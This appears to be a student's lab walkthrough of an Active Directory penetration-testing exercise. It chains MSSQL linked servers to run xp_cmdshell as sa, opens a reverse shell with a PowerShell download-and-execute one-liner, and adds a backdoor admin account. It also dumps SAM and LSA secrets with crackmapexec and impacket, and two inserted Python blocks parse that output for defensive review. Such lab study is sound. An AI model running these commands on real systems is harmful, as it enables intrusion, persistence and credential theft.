Learning Objective - 22
MSSQL Servers
Discovering SPNs.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon : 1/10/2024 3:22 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon : 1/10/2024 3:22 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon : 3/5/2024 11:56 AM
Description :
Checking access to the services.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: DCORP-STD723 : Connection Failed.
VERBOSE: Closing the runspace pool
ComputerName Instance Status
------------ -------- ------
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local Accessible
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local,1433 Not Accessible
DCORP-STD723 DCORP-STD723 Not Accessible
We collect information about the services we have access to.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1976
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student723
IsSysadmin : No
ActiveSessions : 1
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1976
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student723
IsSysadmin : No
ActiveSessions : 1
Looking for links to a remote MSSQL service.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLink -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
ComputerName : dcorp-mssql
Instance : dcorp-mssql
DatabaseLinkId : 0
DatabaseLinkName : DCORP-MSSQL
DatabaseLinkLocation : Local
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : True
is_data_access_enabled : False
modify_date : 11/14/2022 4:46:10 AM
ComputerName : dcorp-mssql
Instance : dcorp-mssql
DatabaseLinkId : 1
DatabaseLinkName : DCORP-SQL1
DatabaseLinkLocation : Remote
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 12/4/2022 5:16:19 AM
Enumerating links recursively.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL
VERBOSE: - Link Login: dcorp\student723
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE: - Link Login: dblinkuser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE: - Link Login: sqluser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: EU-SQL37
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
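As an added example (not from the original notes and not part of PowerUpSQL), the following Python parses the record-style output shown in the SPN listing above and in the crawl results, and reports the two findings a reviewer would pull out of this section: which MSSQL SPNs sit on domain user accounts rather than machine accounts (svcadmin on dcorp-mgmt, whose description already says "high privileges"), and which link chains end at a sysadmin login (sa on EU-SQL37, reached from a plain domain user through three link mappings). The sample strings are constructed, cut-down copies of the output above; the function names are the example's own.

```python
from typing import Dict, List, Tuple

Record = Dict[str, str]

# Constructed sample: a cut-down copy of the Get-SQLInstanceDomain output above.
SPN_OUTPUT = """\
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccount : svcadmin
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccount : DCORP-MSSQL$
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
Description :
"""

# Constructed sample: the result records of Get-SQLServerLinkCrawl above.
CRAWL_OUTPUT = """\
Instance : DCORP-MSSQL
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\\student723
Instance : DCORP-SQL1
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Instance : DCORP-MGMT
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Instance : EU-SQL37
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
"""


def parse_records(text: str) -> List[Record]:
    """Split PowerShell list-format output into one dict per object.

    One 'Name : Value' line per property; pasted notes lose the blank
    separators, so a new object starts whenever a property name repeats."""
    records: List[Record] = []
    current: Record = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("VERBOSE:"):
            continue
        key, sep, value = line.partition(" :")
        if not sep:
            continue
        key = key.strip()
        if key in current:
            records.append(current)
            current = {}
        current[key] = value.strip()
    if current:
        records.append(current)
    return records


def service_accounts(records: List[Record]) -> Dict[str, dict]:
    """Group SPNs by holding account; a name ending in '$' is a machine account,
    whose password Windows rotates itself. User accounts keep an admin-chosen
    password, so their SPNs are the ones to review first."""
    summary: Dict[str, dict] = {}
    for r in records:
        acct = r.get("DomainAccount", "")
        entry = summary.setdefault(acct, {"user_account": not acct.endswith("$"),
                                          "spns": [],
                                          "description": r.get("Description", "")})
        entry["spns"].append(r.get("Spn", ""))
    return summary


def hops(records: List[Record]) -> List[Tuple[str, str, bool]]:
    """(instance, mapped login, is_sysadmin) per crawled server, in path order."""
    ordered = sorted(records, key=lambda r: r.get("Path", "").count(","))
    return [(r["Instance"], r.get("User", ""), r.get("Sysadmin") == "1") for r in ordered]


def sysadmin_chains(records: List[Record]) -> List[Tuple[List[str], str]]:
    """Every chain whose last hop is mapped to a sysadmin login: the caller's
    login on the first server becomes sysadmin on the last one purely through
    the link mappings, which is the finding to escalate to the DBA team."""
    found = []
    for r in records:
        if r.get("Sysadmin") == "1":
            path = [p.strip() for p in r.get("Path", "").strip("{}").split(",")]
            found.append((path, r.get("User", "")))
    return found


if __name__ == "__main__":
    for acct, info in service_accounts(parse_records(SPN_OUTPUT)).items():
        kind = "USER account" if info["user_account"] else "machine account"
        print(f"{acct:14} {kind:16} {' '.join(info['spns'])}")
    for inst, login, admin in hops(parse_records(CRAWL_OUTPUT)):
        print(f"{inst:12} login={login:18} sysadmin={admin}")
    for path, login in sysadmin_chains(parse_records(CRAWL_OUTPUT)):
        print("sysadmin reachable via", " -> ".join(path), "as", login)
```

The parser is deliberately tolerant of the pasted form of the output (no blank lines between objects, VERBOSE lines interleaved), which is how this data usually arrives in a report. The remediation signal is in the last function: any chain that ends with `Sysadmin = 1` should have its link login remapped to a low-privilege remote login, and the outbound link chain (DCORP-MSSQL to DCORP-SQL1 to DCORP-MGMT to EU-SQL37) crosses a forest boundary, which is worth flagging on its own.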
Then we execute commands with the following command:
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
We test it using PowerShell.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""whoami""'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
Then we run a reverse shell as we did before, but this time using a different PowerShell download method.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""iex (iwr -UseBasicParsing http://172.16.100.23:8080/Invoke-PowerShellTcp.ps1)""'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
In our other terminal we listen on the configured port and get a shell.
C:\AD\Tools\netcat-win32-1.12>.\nc.exe -lvp 6969
listening on [any] 6969 ...
172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.15.17] 56047: NO_DATA
Windows PowerShell running as user SYSTEM on EU-SQL37
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql37
PS C:\Windows\system32>
Now we will try to view information about the current domain.
PS C:\> Invoke-WebRequest -Uri "http://172.16.100.23:8080/PowerView.ps1" -OutFile "PowerView.ps1"
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:15 AM PerfLogs
d-r--- 11/14/2022 7:42 PM Program Files
d----- 11/14/2022 7:41 PM Program Files (x86)
d-r--- 11/15/2022 1:49 AM Users
d----- 1/10/2024 5:38 AM Windows
-a---- 3/6/2024 6:11 AM 924339 PowerView.ps1
PS C:\> . .\PowerView.ps1
PS C:\> Get-DomainComputer | select samaccountname
samaccountname
--------------
EU-DC$
EU-SQL37$
PS C:\> Get-DomainUser | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
dbadmin
PS C:\> Get-DomainTrust
SourceName : eu.eurocorp.local
TargetName : eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 2/20/2024 7:48:15 AM
PS C:\> Get-Forest
RootDomainSid : S-1-5-21-3333069040-3914854601-3606488808
Name : eurocorp.local
Sites : {Default-First-Site-Name}
Domains : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local, DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local, DC=DomainDnsZones,DC=eurocorp,DC=local}
ForestModeLevel : 7
ForestMode : Unknown
RootDomain : eurocorp.local
Schema : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner : eurocorp-dc.eurocorp.local
NamingRoleOwner : eurocorp-dc.eurocorp.local
PS C:\> Get-DomainComputer -Domain eurocorp.local | select samaccountname
samaccountname
--------------
EUROCORP-DC$
PS C:\> Get-DomainUser -Domain eurocorp.local | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
PS C:\> Get-DomainTrust -Domain eurocorp.local
SourceName : eurocorp.local
TargetName : eu.eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 2/20/2024 7:48:14 AM
SourceName : eurocorp.local
TargetName : dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 2/20/2024 7:50:52 AM
We also verify that we have access to the computer from our PC.
PS C:\AD\Tools\PowerUpSQL-master> nslookup EU-SQL37.EU.EUROCORP.LOCAL
Server: UnKnown
Address: 172.16.2.1
Non-authoritative answer:
Name: EU-SQL37.EU.EUROCORP.LOCAL
Address: 172.16.15.17
PS C:\AD\Tools\PowerUpSQL-master> ping 172.16.15.17
Pinging 172.16.15.17 with 32 bytes of data:
Reply from 172.16.15.17: bytes=32 time=5ms TTL=127
Reply from 172.16.15.17: bytes=32 time=4ms TTL=127
Ping statistics for 172.16.15.17:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 4ms, Maximum = 5ms, Average = 4ms
Setting up some rather hacky persistence XD
PS C:\Windows\system32> net user bombitaeu Password123! /add
The command completed successfully.
PS C:\Windows\system32> net localgroup administrators bombitaeu /add
The command completed successfully.
PS C:\Windows\system32> net user bombitaeu
User name bombitaeu
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/6/2024 6:34:21 AM
Password expires 4/17/2024 6:34:21 AM
Password changeable 3/7/2024 6:34:21 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
PS C:\Windows\system32>
We dump whatever we can.
crackmapexec smb 172.16.15.17 -u 'bombitaeu' -p 'Password123!' -d '.' --lsa
SMB 172.16.15.17 445 EU-SQL37 [*] Windows 10.0 Build 20348 x64 (name:EU-SQL37) (domain:.) (signing:False) (SMBv1:False)
SMB 172.16.15.17 445 EU-SQL37 [+] .\bombitaeu:Password123! (Pwn3d!)
SMB 172.16.15.17 445 EU-SQL37 [+] Dumping LSA secrets
SMB 172.16.15.17 445 EU-SQL37 EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
SMB 172.16.15.17 445 EU-SQL37 dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
SMB 172.16.15.17 445 EU-SQL37 NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB 172.16.15.17 445 EU-SQL37 [+] Dumped 8 LSA secrets to /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.secrets and /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.cached
impacket-secretsdump 'bombitaeu@172.16.15.17'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Target system bootKey: 0x5522f4ec06d0bf5dac89558b5e57206e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdcfd73ba273d2b6ab67f1fecd83e88e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bombitaeu:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Dumping cached domain logon information (domain/username:hash)
EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
[*] NL$KM
0000 09 C8 7B C2 96 41 6E CB B2 F6 1B DC 29 5C 39 76 ..{..An.....)\9v
0010 7E A6 22 97 DC D3 BE 6B C3 71 48 71 61 6B B2 B3 ~."....k.qHqak..
0020 D0 D6 E0 48 F0 8B 7D 8B 8B 14 95 05 B4 21 FE 93 ...H..}......!..
0030 28 51 47 F1 26 24 B5 F4 E4 20 B6 AC E5 90 33 02 (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] Cleaning up...
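As an added example (not from the original notes, crackmapexec or impacket), the following Python parses impacket-secretsdump output of the shape shown above into its sections and turns it into the scoping list an incident responder needs after such a dump: which local and domain accounts must be rotated, which computer account must be reset, and which machine keys must be treated as compromised. The sample is constructed with placeholder hashes rather than the page's real values; function names are the example's own.

```python
from typing import Dict, List

# Constructed sample in the secretsdump layout above; hashes are placeholders.
SAMPLE = """\
[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bombitaeu:1001:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
[*] Dumping cached domain logon information (domain/username:hash)
EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#33333333333333333333333333333333
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EU\\EU-SQL37$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444
EU\\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x6666666666666666666666666666666666666666
dpapi_userkey:0x7777777777777777777777777777777777777777
[*] NL$KM
NL$KM:8888888888888888888888888888888888888888888888888888888888888888
[*] Cleaning up...
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_secretsdump(text: str) -> Dict[str, List[str]]:
    """Group the data lines under the '[*] ...' header that precedes them."""
    sections: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        if line.startswith("[*] "):
            header = line[4:].strip()
            if header.startswith("Dumping local SAM"):
                current = "SAM"
            elif header.startswith("Dumping cached"):
                current = "DCC2"
            elif header in ("$MACHINE.ACC", "DPAPI_SYSTEM", "NL$KM"):
                current = header
            else:
                current = None  # bootKey, "Dumping LSA Secrets", cleanup
            continue
        if current and line.strip():
            sections.setdefault(current, []).append(line.strip())
    return sections


def exposure_report(sections: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """What each dumped section means for the response team."""
    report: Dict[str, List[str]] = {"rotate": [], "reset": [], "compromised_keys": []}
    for entry in sections.get("SAM", []):
        user, _rid, _lm, nt = entry.split(":")[:4]
        if nt != EMPTY_NT:  # accounts with an empty password carry no usable secret
            report["rotate"].append("local:" + user)
    for entry in sections.get("DCC2", []):
        # DCC2 is slow to crack but offline-crackable: the domain user's password is exposed
        report["rotate"].append("domain:" + entry.split(":", 1)[0])
    if sections.get("$MACHINE.ACC"):
        report["reset"].append("computer account:" + sections["$MACHINE.ACC"][0].split(":", 1)[0])
    if sections.get("DPAPI_SYSTEM"):
        report["compromised_keys"].append("DPAPI_SYSTEM (every machine-scope DPAPI secret)")
    if sections.get("NL$KM"):
        report["compromised_keys"].append("NL$KM (key protecting cached domain logons)")
    return report


if __name__ == "__main__":
    for action, items in exposure_report(parse_secretsdump(SAMPLE)).items():
        for item in items:
            print(f"{action:17} {item}")
```

In this scenario the list also surfaces the attacker-created local administrator (bombitaeu), which should be removed rather than rotated, and the cached dbadmin credential, which shows that a domain account with a privileged-sounding name has logged on interactively to a SQL host that a low-privilege user could reach through linked servers.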
Querying directly with SQL queries
Since it is failing, we will run the tests from SQL.
Second hop.
Third hop.
Executing commands.
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql37.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "mkdir C:\test"'''')'')')
Then we can see that the test directory has indeed been created.
PS C:\> ls
Directory: C:\
